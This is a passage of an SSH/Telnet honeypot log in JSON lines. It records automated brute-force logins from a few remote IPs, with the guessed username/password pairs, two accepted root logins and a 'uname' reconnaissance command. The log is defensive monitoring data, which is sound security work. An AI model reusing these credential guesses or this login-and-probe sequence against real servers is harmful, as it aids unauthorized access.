{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T05:21:10.368297Z","src_ip":"212.227.235.229","session":"a76d66a22394"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T05:21:10.498211Z","src_ip":"212.227.235.229","session":"a76d66a22394"}
{"eventid":"cowrie.login.failed","username":"apache","password":"apache123","message":"login attempt [apache/apache123] failed","sensor":"my-vps","timestamp":"2025-08-28T05:21:11.088928Z","src_ip":"212.227.235.229","session":"a76d66a22394"}
{"eventid":"cowrie.session.closed","duration":"1.9","message":"Connection lost after 1.9 seconds","sensor":"my-vps","timestamp":"2025-08-28T05:21:12.234905Z","src_ip":"212.227.235.229","session":"a76d66a22394"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":44654,"dst_ip":"1.2.3.4","dst_port":22,"session":"cdc3ed263e2e","protocol":"ssh","message":"New connection: 212.227.125.160:44654 (1.2.3.4:22) [session: cdc3ed263e2e]","sensor":"my-vps","timestamp":"2025-08-28T05:21:16.769380Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T05:21:16.794146Z","src_ip":"212.227.125.160","session":"cdc3ed263e2e"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T05:21:16.875037Z","src_ip":"212.227.125.160","session":"cdc3ed263e2e"}
{"eventid":"cowrie.login.success","username":"root","password":"P@ssw0rd","message":"login attempt [root/P@ssw0rd] succeeded","sensor":"my-vps","timestamp":"2025-08-28T05:21:17.295715Z","src_ip":"212.227.125.160","session":"cdc3ed263e2e"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T05:21:17.615408Z","src_ip":"212.227.125.160","session":"cdc3ed263e2e"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-28T05:21:17.616506Z","src_ip":"212.227.125.160","session":"cdc3ed263e2e"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 0.1 seconds","sensor":"my-vps","timestamp":"2025-08-28T05:21:17.723308Z","src_ip":"212.227.125.160","session":"cdc3ed263e2e"}
{"eventid":"cowrie.session.closed","duration":"1.0","message":"Connection lost after 1.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T05:21:17.724457Z","src_ip":"212.227.125.160","session":"cdc3ed263e2e"}
{"eventid":"cowrie.session.closed","duration":13.049740314483643,"message":"Connection lost after 13 seconds","sensor":"my-vps","timestamp":"2025-08-28T05:21:21.292755Z","src_ip":"212.227.125.160","session":"561efb8bc9c4"}
{"eventid":"cowrie.session.connect","src_ip":"8.222.212.69","src_port":52152,"dst_ip":"1.2.3.4","dst_port":23,"session":"b6e93cf502a9","protocol":"telnet","message":"New connection: 8.222.212.69:52152 (1.2.3.4:23) [session: b6e93cf502a9]","sensor":"my-vps","timestamp":"2025-08-28T05:21:30.336345Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":34756,"dst_ip":"1.2.3.4","dst_port":22,"session":"6c9347c811db","protocol":"ssh","message":"New connection: 212.227.125.160:34756 (1.2.3.4:22) [session: 6c9347c811db]","sensor":"my-vps","timestamp":"2025-08-28T05:21:31.396735Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T05:21:31.397747Z","src_ip":"212.227.125.160","session":"6c9347c811db"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T05:21:31.502539Z","src_ip":"212.227.125.160","session":"6c9347c811db"}
{"eventid":"cowrie.login.success","username":"root","password":"!qaz@WSX","message":"login attempt [root/!qaz@WSX] succeeded","sensor":"my-vps","timestamp":"2025-08-28T05:21:31.819675Z","src_ip":"212.227.125.160","session":"6c9347c811db"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T05:21:32.049684Z","src_ip":"212.227.125.160","session":"6c9347c811db"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-28T05:21:32.050371Z","src_ip":"212.227.125.160","session":"6c9347c811db"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 0.1 seconds","sensor":"my-vps","timestamp":"2025-08-28T05:21:32.156766Z","src_ip":"212.227.125.160","session":"6c9347c811db"}
{"eventid":"cowrie.session.closed","duration":"0.8","message":"Connection lost after 0.8 seconds","sensor":"my-vps","timestamp":"2025-08-28T05:21:32.157908Z","src_ip":"212.227.125.160","session":"6c9347c811db"}
{"eventid":"cowrie.session.connect","src_ip":"217.72.205.35","src_port":59456,"dst_ip":"1.2.3.4","dst_port":22,"session":"49a112f7c72a","protocol":"ssh","message":"New connection: 217.72.205.35:59456 (1.2.3.4:22) [session: 49a112f7c72a]","sensor":"my-vps","timestamp":"2025-08-28T05:21:45.188210Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T05:21:45.189735Z","src_ip":"217.72.205.35","session":"49a112f7c72a"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":57142,"dst_ip":"1.2.3.4","dst_port":22,"session":"0c70adae472a","protocol":"ssh","message":"New connection: 212.227.235.229:57142 (1.2.3.4:22) [session: 0c70adae472a]","sensor":"my-vps","timestamp":"2025-08-28T05:21:54.644118Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T05:21:54.645467Z","src_ip":"212.227.235.229","session":"0c70adae472a"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T05:21:54.790361Z","src_ip":"212.227.235.229","session":"0c70adae472a"}
{"eventid":"cowrie.login.failed","username":"user","password":"user","message":"login attempt [user/user] failed","sensor":"my-vps","timestamp":"2025-08-28T05:21:55.227566Z","src_ip":"212.227.235.229","session":"0c70adae472a"}
{"eventid":"cowrie.session.closed","duration":"1.7","message":"Connection lost after 1.7 seconds","sensor":"my-vps","timestamp":"2025-08-28T05:21:56.374991Z","src_ip":"212.227.235.229","session":"0c70adae472a"}
{"eventid":"cowrie.session.closed","duration":31.666622638702393,"message":"Connection lost after 31 seconds","sensor":"my-vps","timestamp":"2025-08-28T05:22:02.002883Z","src_ip":"8.222.212.69","session":"b6e93cf502a9"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":57992,"dst_ip":"1.2.3.4","dst_port":22,"session":"640c2539c711","protocol":"ssh","message":"New connection: 212.227.125.160:57992 (1.2.3.4:22) [session: 640c2539c711]","sensor":"my-vps","timestamp":"2025-08-28T05:22:02.286370Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T05:22:02.351515Z","src_ip":"212.227.125.160","session":"640c2539c711"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T05:22:02.454455Z","src_ip":"212.227.125.160","session":"640c2539c711"}
{"eventid":"cowrie.login.failed","username":"user","password":"user","message":"login attempt [user/user] failed","sensor":"my-vps","timestamp":"2025-08-28T05:22:02.837862Z","src_ip":"212.227.125.160","session":"640c2539c711"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":54590,"dst_ip":"1.2.3.4","dst_port":22,"session":"88e432cbc692","protocol":"ssh","message":"New connection: 212.227.125.160:54590 (1.2.3.4:22) [session: 88e432cbc692]","sensor":"my-vps","timestamp":"2025-08-28T05:22:03.048195Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T05:22:03.082991Z","src_ip":"212.227.125.160","session":"88e432cbc692"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T05:22:03.193454Z","src_ip":"212.227.125.160","session":"88e432cbc692"}
{"eventid":"cowrie.login.failed","username":"lighthouse","password":"123456","message":"login attempt [lighthouse/123456] failed","sensor":"my-vps","timestamp":"2025-08-28T05:22:03.580080Z","src_ip":"212.227.125.160","session":"88e432cbc692"}
{"eventid":"cowrie.session.closed","duration":"1.7","message":"Connection lost after 1.7 seconds","sensor":"my-vps","timestamp":"2025-08-28T05:22:03.948755Z","src_ip":"212.227.125.160","session":"640c2539c711"}
{"eventid":"cowrie.session.closed","duration":"1.7","message":"Connection lost after 1.7 seconds","sensor":"my-vps","timestamp":"2025-08-28T05:22:04.701935Z","src_ip":"212.227.125.160","session":"88e432cbc692"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":46156,"dst_ip":"1.2.3.4","dst_port":22,"session":"0f1633e7a76e","protocol":"ssh","message":"New connection: 212.227.235.229:46156 (1.2.3.4:22) [session: 0f1633e7a76e]","sensor":"my-vps","timestamp":"2025-08-28T05:22:10.496505Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T05:22:10.497432Z","src_ip":"212.227.235.229","session":"0f1633e7a76e"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T05:22:10.641336Z","src_ip":"212.227.235.229","session":"0f1633e7a76e"}
{"eventid":"cowrie.login.failed","username":"lighthouse","password":"123456","message":"login attempt [lighthouse/123456] failed","sensor":"my-vps","timestamp":"2025-08-28T05:22:11.083110Z","src_ip":"212.227.235.229","session":"0f1633e7a76e"}
{"eventid":"cowrie.session.closed","duration":"1.7","message":"Connection lost after 1.7 seconds","sensor":"my-vps","timestamp":"2025-08-28T05:22:12.230762Z","src_ip":"212.227.235.229","session":"0f1633e7a76e"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/1092f3da081f46047853850eaeeae92393bc1e307b2916a1e6ed70b100fbb2d5","size":524,"shasum":"1092f3da081f46047853850eaeeae92393bc1e307b2916a1e6ed70b100fbb2d5","duplicate":true,"duration":"180.0","message":"Closing TTY Log: var/lib/cowrie/tty/1092f3da081f46047853850eaeeae92393bc1e307b2916a1e6ed70b100fbb2d5 after 180.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T05:22:16.863061Z","src_ip":"176.65.149.186","session":"d46b3704062f"}
{"eventid":"cowrie.session.closed","duration":180.19814729690552,"message":"Connection lost after 180 seconds","sensor":"my-vps","timestamp":"2025-08-28T05:22:16.867989Z","src_ip":"176.65.149.186","session":"d46b3704062f"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":40610,"dst_ip":"1.2.3.4","dst_port":22,"session":"b0874d4fe4fb","protocol":"ssh","message":"New connection: 212.227.125.160:40610 (1.2.3.4:22) [session: b0874d4fe4fb]","sensor":"my-vps","timestamp":"2025-08-28T05:22:18.083224Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T05:22:18.126064Z","src_ip":"212.227.125.160","session":"b0874d4fe4fb"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T05:22:18.271998Z","src_ip":"212.227.125.160","session":"b0874d4fe4fb"}
{"eventid":"cowrie.login.failed","username":"flask","password":"12345678","message":"login attempt [flask/12345678] failed","sensor":"my-vps","timestamp":"2025-08-28T05:22:18.809793Z","src_ip":"212.227.125.160","session":"b0874d4fe4fb"}
{"eventid":"cowrie.session.closed","duration":"1.9","message":"Connection lost after 1.9 seconds","sensor":"my-vps","timestamp":"2025-08-28T05:22:20.033370Z","src_ip":"212.227.125.160","session":"b0874d4fe4fb"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":47978,"dst_ip":"1.2.3.4","dst_port":22,"session":"75ae55860498","protocol":"ssh","message":"New connection: 212.227.235.229:47978 (1.2.3.4:22) [session: 75ae55860498]","sensor":"my-vps","timestamp":"2025-08-28T05:22:25.576833Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T05:22:25.640362Z","src_ip":"212.227.235.229","session":"75ae55860498"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-